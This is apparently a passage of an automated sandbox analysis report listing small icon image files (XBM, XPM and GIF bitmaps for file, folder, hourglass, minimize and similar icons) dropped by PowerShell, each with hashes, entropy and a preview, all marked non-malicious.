                                                                                                                                                                                                              Size (bytes):238
                                                                                                                                                                                                              Entropy (8bit):3.961400794483653
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:HDKA596S0+ovGB70596NwUXovNlJMI2IvMR5ffHBkVFJvHJF8L3VZF9JF9JF9JFF:HeAuGoeB70uNeVl9ZMDfHOkh3GG
                                                                                                                                                                                                              MD5:F5CC07DB201FA60FACCEC45A55856A9A
                                                                                                                                                                                                              SHA1:0B8D6FCFE382134426D81E02A3C38F8AC9AB6254
                                                                                                                                                                                                              SHA-256:EF733AD2DA584A41A4D1BF5525E080C60A5F2F332E7D583AB0003D23E1CDCB71
                                                                                                                                                                                                              SHA-512:91161518A2E8356082B0C04A13749C2B0859771DB8F97C97B9388F9133DD02F659BB6495984A4AB7B5B03E961117BE2912EE53D2075B672B790A7DAA5EF2C12B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define file_width 12..#define file_height 12..static unsigned char file_bits[] = {.. 0xfe, 0x00, 0x02, 0x03, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02,.. 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0xfe, 0x03};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):316
                                                                                                                                                                                                              Entropy (8bit):3.863813347149259
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:UGCinNS3iGeyURv3LSFHGJU9spLNgHqNlp69pFF29pLLFHmJ9f9LFHYh9f9LFHYU:UGXA3Vfcv3mFHeU9s3NWwooooooots
                                                                                                                                                                                                              MD5:2DDE5E6C2816C5560C27E7D2F9B267B5
                                                                                                                                                                                                              SHA1:BE09C4BEED5B93CE65832D3C08DB6A75991FCC47
                                                                                                                                                                                                              SHA-256:520E7D4A55E1AB59720FAF0A7BF31E54FC3B50F3B569C38C458D1943BF0BF731
                                                                                                                                                                                                              SHA-512:818C7AD1713C512B0F5C1494A34742B251B658C56DF87CEE91721282E3143236B2BD53CF169696C5E0A9B0B58CEEA245E08060CABFD853EDD1DD87B249A0E12D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * file_xpm[] = {.."12 12 3 1",.." .s None.c None",.."..c black",.."X.c #FFFFFFFFF3CE",.." ........ ",.." .XXXXXX. ",.." .XXXXXX... ",.." .XXXXXXXX. ",.." .XXXXXXXX. ",.." .XXXXXXXX. ",.." .XXXXXXXX. ",.." .XXXXXXXX. ",.." .XXXXXXXX. ",.." .XXXXXXXX. ",.." .XXXXXXXX. ",.." .......... "};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 16 x 12
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):79
                                                                                                                                                                                                              Entropy (8bit):4.749426475778731
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Cw6/R/iltEchkltxlDnFhg+umMZe:R6/R/GlN+ie
                                                                                                                                                                                                              MD5:2975E8D3AAF99066CCEE1ADEB2622379
                                                                                                                                                                                                              SHA1:8C190BA2999CF92E521B68561F79F6DF94E09B9F
                                                                                                                                                                                                              SHA-256:4E03A2FE3CD8A5D64EB924D1561FF838F473C10C3D8D97FBDE6762F3A1B44611
                                                                                                                                                                                                              SHA-512:3921C96C93EC8E63CA4826F26188E9DE3DB99227892853BD36183F9FF1B3CB3FFA55D8E748F373CFF7FE280C0488FCFD250ECAD96AFF852639C3CC476F473672
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF89a...................!.......,.......... ..a.'/T[.B....Q..Vi>h....q.R..;
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):220
                                                                                                                                                                                                              Entropy (8bit):4.249051637566487
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAp506orM0pBVVl98tDfHxhEhkkkdkkb:HeM5paNl8tFhEu
                                                                                                                                                                                                              MD5:4C0C2266E4D07207999D529B96A7ACB3
                                                                                                                                                                                                              SHA1:E64EB255FD63D246585BC3C50984DD5A08C975F1
                                                                                                                                                                                                              SHA-256:E7D82AAB810CED6C2026994DE6CAF5CFA7C2AEBA2349701FE914F1DC9EE59378
                                                                                                                                                                                                              SHA-512:15CEF592C19A6EC17A9EC2E3ACBFD0DBAF514B482F281D1FADAB7C6EDF17333A2F6283DB9E0F3AAF70949D0B1CC8E0CB57FAE47D966A49E771CC2F69D21998FF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define folder_width 16..#define folder_height 10..static unsigned char folder_bits[] = {.. 0xfc, 0x00, 0x02, 0x07, 0x01, 0x08, 0x01, 0x08, 0x01, 0x08, 0x01, 0x08,.. 0x01, 0x08, 0x01, 0x08, 0x01, 0x08, 0xff, 0x07};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):439
                                                                                                                                                                                                              Entropy (8bit):4.120806952877703
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:UGXGaXhIGfjLLSKsADKNGfvEmFHeU9sF582c:UG2aJbLLOILfcweksF582c
                                                                                                                                                                                                              MD5:DDFCFF6C9C268CC8E5032EB4520DB237
                                                                                                                                                                                                              SHA1:85FF93364CB50D7FBC17EDEB4CECED181C94DFB3
                                                                                                                                                                                                              SHA-256:797ABA91BC16D98770751CD17B44A9D40758C442F251E2155B77CA1C42E32CCD
                                                                                                                                                                                                              SHA-512:C305E3EF60A60CDC5C1BC6733336C5405EB2F95DB2AD0872BE822DC2A5AB01A42B92895FB9A046FAAAEC774F96A7FCF8618D5F839B7EF9DEC94EF740DF411DF7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * folder_foo_xpm[] = {../* width height num_colors chars_per_pixel */.."16 12 3 1",../* colors */.." .s None.c None",.."..c black",.."X.c #f0ff80",../* pixels */.." .... ",.." .XXXX. ",.." .XXXXXX. ",.."............. ",..".XXXXXXXXXXX. ",..".XXXXXXXXXXX. ",..".XXXXXXXXXXX. ",..".XXXXXXXXXXX. ",..".XXXXXXXXXXX. ",..".XXXXXXXXXXX. ",..".XXXXXXXXXXX. ",.."............. "};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (32x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):910
                                                                                                                                                                                                              Entropy (8bit):3.3090246772989462
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:HePIt60ddwohQWJKoheV5gtLRKL1LQ5YohRp5gwohRDMtM:J5xJoQhWLqtM
                                                                                                                                                                                                              MD5:27F9FCDAE100F663893958BC022A120C
                                                                                                                                                                                                              SHA1:1EB4D5B65C9A475CF1667BEEE414ADB2F84075F8
                                                                                                                                                                                                              SHA-256:0112CD468574B726EE78DB9EB9E104882705A204F942DDAE14F3C5DF2B3987BE
                                                                                                                                                                                                              SHA-512:79411C1326EBC441E20A116F14042DE523B74241B4D2A1ABD60ED71AB165F030CC43420AA0FA75CD00205014ADD9AC9BA931B133419223217010626C988FE5C4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define harddisk_width 32..#define harddisk_height 32..static unsigned char harddisk_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0xf8, 0xff, 0xff, 0x1f, 0x08, 0x00, 0x00, 0x18, 0xa8, 0xaa, 0xaa, 0x1a,.. 0x48, 0x55, 0xd5, 0x1d, 0xa8, 0xaa, 0xaa, 0x1b, 0x48, 0x55, 0x55, 0x1d,.. 0xa8, 0xfa, 0xaf, 0x1a, 0xc8, 0xff, 0xff, 0x1d, 0xa8, 0xfa, 0xaf, 0x1a,.. 0x48, 0x55, 0x55, 0x1d, 0xa8, 0xaa, 0xaa, 0x1a, 0x48, 0x55, 0x55, 0x1d,.. 0xa8, 0xaa, 0xaa, 0x1a, 0xf8, 0xff, 0xff, 0x1f, 0xf8, 0xff, 0xff, 0x1f,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (32x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):985
                                                                                                                                                                                                              Entropy (8bit):3.9066788783510926
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:HeyKcaudL99Kwn06e0R7VldG7G0x3Ti8wERh/QmL3q:8wnPe0hVix328wPn
                                                                                                                                                                                                              MD5:EB2B7A7ED5C5B3F928A9DB2ABFE377B0
                                                                                                                                                                                                              SHA1:288BC0BF44BD729BCF0F27212D607A7996E39D18
                                                                                                                                                                                                              SHA-256:4BE19EF1F480D8DFA650C3D0ED635A34D5B08DA3A8F9726F28C91834D967272C
                                                                                                                                                                                                              SHA-512:201939CB5B063DBABA817E56612D4D2DD7C8F06A05C2FE7C569CC81FD6A4C15B584A403AA6B63874FFA6371111B81A970D9779FC77E8DC642BEC838F7880CE5F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define hourglass_mask_width 32..#define hourglass_mask_height 32..#define hourglass_mask_x_hot 16..#define hourglass_mask_y_hot 15..static char hourglass_mask_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0xfc, 0xff, 0xff, 0x7f, 0xfc, 0xff, 0xff, 0x7f,.. 0x58, 0x00, 0x00, 0x34, 0x58, 0x00, 0x00, 0x34, 0x58, 0x00, 0x00, 0x34,.. 0x98, 0x00, 0x00, 0x32, 0x98, 0x00, 0x00, 0x32, 0x98, 0x00, 0x00, 0x32,.. 0x18, 0x01, 0x00, 0x31, 0x18, 0xfd, 0x7e, 0x31, 0x18, 0xfa, 0xbf, 0x30,.. 0x18, 0xe4, 0x4f, 0x30, 0x18, 0xd8, 0x37, 0x30, 0x18, 0x20, 0x09, 0x30,.. 0x18, 0x40, 0x05, 0x30, 0x18, 0x20, 0x08, 0x30, 0x18, 0x18, 0x31, 0x30,.. 0x18, 0x04, 0x41, 0x30, 0x18, 0x02, 0x80, 0x30, 0x18, 0x01, 0x00, 0x31,.. 0x18, 0x01, 0x00, 0x31, 0x98, 0x00, 0x01, 0x32, 0x98, 0x00, 0x01, 0x32,.. 0x98, 0x80, 0x03, 0x32, 0x58, 0xc0, 0x07, 0x34, 0x58, 0xf0, 0x1f, 0x34,.. 0x58, 0xfe, 0xff, 0x34, 0xf8, 0xff, 0xff, 0x3f, 0xfc, 0xff, 0xff, 0x7f,.. 0xfc, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x00, 0x00};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (32x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):956
                                                                                                                                                                                                              Entropy (8bit):3.8257665228886215
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:HeUmaKzECIettttt3A+dPdgfLkbCLWc6TWOLcGRnXafEEhFtODNekRsC9Ef:EzE2dqfwugTWOL3RnK8HqgC
                                                                                                                                                                                                              MD5:09B06057E1B8A4897649CC676C7D1968
                                                                                                                                                                                                              SHA1:12473ADFF3D6C1475CD9564E8345A1F1AF836B6F
                                                                                                                                                                                                              SHA-256:8AB90AA067DB1AEDD294B46FA7F47C2320E4A4C5C922445436D7FCC2EC1239A5
                                                                                                                                                                                                              SHA-512:7572991055EB7EB0C1AFB0345BD00939023FC2590D17D83D682A4E0843A7E719490E748DE4F639E7D2BAC3CA64919833CBE819413F1D107B3B9FB957A8D68F47
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define hourglass_width 32..#define hourglas_height 32..#define hourglas_x_hot 16..#define hourglas_y_hot 15..static char hourglas_bits[] = {.. 0xfe, 0xff, 0xff, 0xff, 0xfe, 0xff, 0xff, 0xff, 0xfe, 0xff, 0xff, 0xff,.. 0x7c, 0x00, 0x00, 0x7c, 0x7c, 0x00, 0x00, 0x7c, 0x7c, 0x00, 0x00, 0x7c,.. 0xfc, 0x00, 0x00, 0x7e, 0xfc, 0x00, 0x00, 0x7e, 0xfc, 0x00, 0x00, 0x7e,.. 0xbc, 0x01, 0x00, 0x7b, 0xbc, 0xfd, 0x7e, 0x7b, 0x3c, 0xfb, 0xbf, 0x79,.. 0x3c, 0xe6, 0xcf, 0x78, 0x3c, 0xdc, 0x77, 0x78, 0x3c, 0x38, 0x39, 0x78,.. 0x3c, 0x60, 0x0d, 0x78, 0x3c, 0x38, 0x38, 0x78, 0x3c, 0x1c, 0x71, 0x78,.. 0x3c, 0x06, 0xc1, 0x78, 0x3c, 0x03, 0x80, 0x79, 0xbc, 0x01, 0x00, 0x7b,.. 0xbc, 0x01, 0x00, 0x7b, 0xfc, 0x00, 0x01, 0x7e, 0xfc, 0x00, 0x01, 0x7e,.. 0xfc, 0x80, 0x03, 0x7e, 0x7c, 0xc0, 0x07, 0x7c, 0x7c, 0xf0, 0x1f, 0x7c,.. 0x7c, 0xfe, 0xff, 0x7c, 0xfe, 0xff, 0xff, 0x7f, 0xfe, 0xff, 0xff, 0xff,.. 0xfe, 0xff, 0xff, 0xff, 0xfe, 0xff, 0xff, 0xff};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (7x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):103
                                                                                                                                                                                                              Entropy (8bit):4.602031445994817
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:HDKA2L60C2DM02LlsjRrEnOLA6HMDfHXLFfLkG:HeA2LnfM02LlstQnOLfHMDfHJkG
                                                                                                                                                                                                              MD5:3620D579E623DD0578363DB35DEA57F9
                                                                                                                                                                                                              SHA1:20D21CEEB6AB03A1EF20AACED15858692659495C
                                                                                                                                                                                                              SHA-256:12FD1F428AAF57523785319DA1DF9F6271C86F44ADAEA467F5020688FACC7101
                                                                                                                                                                                                              SHA-512:40889DAC2635F61FF1E2D4FD2B32460146828A4336D3758DC399BE9E6CA368040BD6B94895688B6BD84EF5CE8945DC7EA7525780EFD02567C707B270E01B7896
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define incr_width 7..#define incr_height 4..static char incr_bits[] = {.. 0x08, 0x1c, 0x3e, 0x7f};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):159
                                                                                                                                                                                                              Entropy (8bit):6.275349075342653
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Csl1/PQE/xlXlyW2+qfUzZ4xd8qyG3QWOoAyUpbmbvSVvLrlBdi1en:NlNQEETcud7yH/yfbvYlBr
                                                                                                                                                                                                              MD5:D158BF37409498D7C94EAFC092942FAF
                                                                                                                                                                                                              SHA1:07D1F4A0C2DBD1A9DD7A6AF2957CED47126B3E18
                                                                                                                                                                                                              SHA-256:B007A8C582991388B12891A8B46445DE6809EF6D52AAA43BF8D946AC8F9F6D43
                                                                                                                                                                                                              SHA-512:FAB5BDA4BB49D9FDF4D571E712A1B831B41A0AF74A9C58BAD6A5B312BA19680D5D63C3CC72B604AE72BBE0580E367D8531F0722ECBEE65477CC1BF99F076F087
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF89a . ..........!.......,.... . ...v......aC...[.V.ty..\Iz..Hj.....I..|O....).O.W..R...|....1....Y..<...1R....9u.]sc.q.0..d..:...Gu....3H..8.g.Hrg.P..;
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1296
                                                                                                                                                                                                              Entropy (8bit):2.5670798586027863
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:UGXyfwvv3mFYMjl/4iAAgQy8JwAKwwCCCCCC4ww74iiQgAAkf:UGCYvf9kPJwAZww7bf
                                                                                                                                                                                                              MD5:97950B7C32082A3FCF086F614695139D
                                                                                                                                                                                                              SHA1:34713F52023A61C445624AA735FC1DB009739B2D
                                                                                                                                                                                                              SHA-256:60528B4C52B71859000A4688C93490F2C8AD60A4D53324C830CD011D123EBB3B
                                                                                                                                                                                                              SHA-512:9D632363B5948E53B63E3ED8AF4FA798C4C2928AFE3FA545273CA08CB091FB67E0FD41A29A1149583DC4DED0FF2858A48A6C7EC9022546623820366D9CDAB97A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * info_xpm[] = {.."32 32 3 1",.." .s None.c None",.."..c #000000000000",.."X.c white",.." ",.." ......... ",.." ...XXXXXXXXX... ",.." .XXXXXXXXXXXXXXX. ",.." ..XXXXXXXXXXXXXXXXX.. ",.." .XXXXXXXXXXXXXXXXXXXXX. ",.." .XXXXXXXXXX...XXXXXXXXXX. ",.." .XXXXXXXXX.....XXXXXXXXX. ",.." .XXXXXXXXX.......XXXXXXXXX. ",.." .XXXXXXXXXX.......XXXXXXXXXX. ",.." .XXXXXXXXXX.......XXXXXXXXXX. ",.." .XXXXXXXXXXX.....XXXXXXXXXXX. ",..".XXXXXXXXXXXXX...XXXXXXXXXXXXX. ",..".XXXXXXXXXXXXXXXXXXXXXXXXXXXXX. ",..".XXXXXXXXXXXXXXXXXXXXXXXXXXXXX. ",..".XXXXXXXXXXX.......XXXXXXXXXXX. ",..".XXXXXXXXXXX.......XXXXXXXXXXX. ",..".XXXXXXXXXXX.......XXXXXXXXXXX. ",..".XXXXXXXXXXX.......XXXXXXXXXXX. ",..".XXXXXXXXXXX.......XXXXXXXXXXX. ",..".XXXXXXXXXXX.......XXXXXXXXXXX. ",.." .XXXXXXXXXX.......XXXXXXXXXX. ",.." .XXXXXXXXXX.......XXXXXXXXXX. ",.." .XXXXXXXXXX.......XXXXXXXXXX. ",.."
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (15x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):290
                                                                                                                                                                                                              Entropy (8bit):4.039587002312218
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAy1xfFmM0y1xfHCr099CMfUDfHZLUpSpS2QpSpSpSpSpS2T4DL4DG:HeHP5Cre9UtLwS8588888k4DL4DG
                                                                                                                                                                                                              MD5:F18707EC8F1F67AB5E6C0A89FFF92A72
                                                                                                                                                                                                              SHA1:C212788B9F5937BF65448D7FEAE365DD60299F7D
                                                                                                                                                                                                              SHA-256:120312587A98B09F2462B64684E9AAFDC2407C8B15254A1C2B184E58AA518273
                                                                                                                                                                                                              SHA-512:315BF5DB20E64CE435E0C4902C88280025E84433E56DEDE2362244C3A60BE6D9D61E08DEF1CA239C2A2EF90229C40E2D1C587947E592831D4F6DD59B7C8150D0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define maximize_width 15..#define maximize_height 15..static unsigned char maximize_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0xfc, 0x1f, 0x04, 0x10, 0x04, 0x70, 0x04, 0x70,.. 0x04, 0x70, 0x04, 0x70, 0x04, 0x70, 0x04, 0x70, 0x04, 0x70, 0x04, 0x70,.. 0xfc, 0x7f, 0xf0, 0x7f, 0xf0, 0x7f};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (15x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):290
                                                                                                                                                                                                              Entropy (8bit):3.7640661972203557
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAyX3mM0yX5Cr099Y1DfHKOxjSsLMGAh6Of:HexCre9+pjSzGAd
                                                                                                                                                                                                              MD5:CCA1372428CDAC6E135D4DC5EADB4A37
                                                                                                                                                                                                              SHA1:4ECE620874451BA4954C821B8924A2EF43E776E1
                                                                                                                                                                                                              SHA-256:63E1B654A0A98A8E291093655EB15E385048134FD80506850B352B6F0DF2B0A6
                                                                                                                                                                                                              SHA-512:28CAFC9BB98EC341D2B7D35E8D279CE5A143F84809C7D0A6ADD4D3A8924A1D83AC6116429A74043A7A78C7D8268B56731614F82CDA2C76B8DD36022BD6CDDDAB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define minimize_width 15..#define minimize_height 15..static unsigned char minimize_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe0, 0x01,.. 0x20, 0x03, 0x20, 0x03, 0xe0, 0x03, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 9 x 9
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):57
                                                                                                                                                                                                              Entropy (8bit):4.206387860560737
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:CMlbGltxlDRoBzEE:/lERoBz
                                                                                                                                                                                                              MD5:529838106788B9FED77490AF8AA1052E
                                                                                                                                                                                                              SHA1:30130C178D7AC53ED2F85AA38A70C2BC49A1819B
                                                                                                                                                                                                              SHA-256:401E41B99D8C8D2EAFA41571B8D321AA419A4CA7AB8136FBE1B0ADB86084D3A6
                                                                                                                                                                                                              SHA-512:EE47844BB3AF2FF2C88ABEBCD609A917B04DEBE0978FBF5679BEE0AC509DDA94A41E20F28A5E41219CA8E50722760EC9B3D97F9AE8EB948418F551A737F581AD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF89a.............!.......,.................^..Lye|....;
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (9x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):203
                                                                                                                                                                                                              Entropy (8bit):4.194683719448727
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAyL9Jc0yL9NsN99i6HqfHMwwwwww42wuwwwh:HeXJWWT9i6HK
                                                                                                                                                                                                              MD5:A4B11E72994C531F4066F97FEBA5F775
                                                                                                                                                                                                              SHA1:0E4C270CC0538A6A1364DAA15551C6FF9931A2A4
                                                                                                                                                                                                              SHA-256:E33FA6675C7ECD3DF86D581A2D6618E1D311418312167185A7DA4C60BB82C862
                                                                                                                                                                                                              SHA-512:CD58AD44DED1DF7870EF53E2D7597A5CCFB3F7A18074FEA5FAEFD866FDB57D0E8CB684DD4EE6757B561B651FDB6ED00B17546635C13105A828365C76C062E737
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define minus_width 9..#define minus_height 9..static unsigned char minus_bits[] = {.. 0xff, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x7d, 0x01, 0x01, 0x01,.. 0x01, 0x01, 0x01, 0x01, 0xff, 0x01};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):215
                                                                                                                                                                                                              Entropy (8bit):3.8295419407496185
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:UGCinN36d6meytUp6/crAJUNFFCvoVvoVvobNF4voVvoVvo1FFI3v:UGXl6d6mfm4UrsUNqwVwVwbowVwVw1wf
                                                                                                                                                                                                              MD5:FFEEEFBE91D89538380711AA1E1B34F8
                                                                                                                                                                                                              SHA1:445DCDB5AFFED7B1DC60A698FF22119A0A72317E
                                                                                                                                                                                                              SHA-256:A7980153DA9B4706E1368F760950F50853739F1C6C29C4A59AB0C4DF5F188A3F
                                                                                                                                                                                                              SHA-512:7E796DDAEAFD1743DA247EE187A264EE058DAB0429523CF13558095856577C84BCA77CC4593E9F1713166FCFDA09D4F079185D0B46D40CC59709AC8AB0B0C2E4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * minus_xpm[] = {.."9 9 2 1",.."..s None.c None",.." .c black",.." ",.." ....... ",.." ....... ",.." ....... ",.." . . ",.." ....... ",.." ....... ",.." ....... ",.." "};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:GIF image data, version 87a, 9 x 9
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):59
                                                                                                                                                                                                              Entropy (8bit):4.196786943300965
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Mfsl0H/XTtK7CO2Wle:de877Je
                                                                                                                                                                                                              MD5:9016B58AB81CEDC76DA7DC75A4E81950
                                                                                                                                                                                                              SHA1:776C9ED182FD889FC2AB2D8367287786E4C90C1E
                                                                                                                                                                                                              SHA-256:CFE867E18C427AA88D5E2404A01AA22D042212222E8304B25275A400E650D1D8
                                                                                                                                                                                                              SHA-512:C602DECC9121E1E2754021BDC35E641E74F800A5C9134DE916A660B690BB65B59F83975D6889E3E03C05BB116ADC2A7274DEC668D24D2965CFF5B12B42168D3E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF87a...................,...................qD.S.......;
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (9x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):212
                                                                                                                                                                                                              Entropy (8bit):4.338980894909355
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAyLL20yLLyDH99i+qfHMww4242ww4A92wwh:HeXd9i8I
                                                                                                                                                                                                              MD5:9CCAEC85AD3A3EB22854E1044DAC5277
                                                                                                                                                                                                              SHA1:56B9BD80EF115E5DEC29D399431BCFDF291D2548
                                                                                                                                                                                                              SHA-256:079C3E9257032EABB0F6E400B13540E5CBC93FECEE5EEAB58B463A2B5E2DE279
                                                                                                                                                                                                              SHA-512:554F252098E490B01128D1FBDE14A1D5545530E9A1F79F1A42CE5CD970E50039CC43F6A4D66ECF4E8A85C3C305404E9466589166A291591A9943BBC02CB7AD95
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define minusarm_width 9..#define minusarm_height 9..static unsigned char minusarm_bits[] = {.. 0xff, 0x01, 0x01, 0x01, 0x7d, 0x01, 0x7d, 0x01, 0x01, 0x01, 0x7d, 0x01,.. 0x7d, 0x01, 0x01, 0x01, 0xff, 0x01};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):235
                                                                                                                                                                                                              Entropy (8bit):4.1491329787618625
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:UGXl+zffOv9sUR+9sY/qwVw+8vWtwVw1wf:UG1SWqnsGaVayf
                                                                                                                                                                                                              MD5:725E36A881D5364669BAD555754BA760
                                                                                                                                                                                                              SHA1:E70F17FB1F970FB7EBD09005A2632B35BDE7E969
